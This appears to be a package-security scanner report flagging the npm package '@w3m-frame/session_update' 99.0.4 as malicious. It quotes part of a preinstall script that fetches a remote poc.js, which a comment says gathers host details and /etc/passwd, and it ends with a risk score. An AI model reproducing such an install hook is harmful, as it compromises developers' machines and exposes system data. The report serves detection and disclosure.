@w3m-frame/session_update @99.0.4
session_update utilities
SAST Findings (5)
--- _-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (c1eb7a6a13f58f487088eedef8df01c804fecfc771cf78992ec4510f3fc6e66e)
The OpenSSF Package Analysis project identified '@w3m-frame/session_update' @ 99.0.4 (npm) as malicious. It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Script: node preinstall.js
Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux
  11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");
  12 |
> 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)
  14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
  15 |   let body = "";
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 148). Findings: 1 critical (+40), 3 high (+75), 3 medium (+30), 1 low (+3).
Published to npm: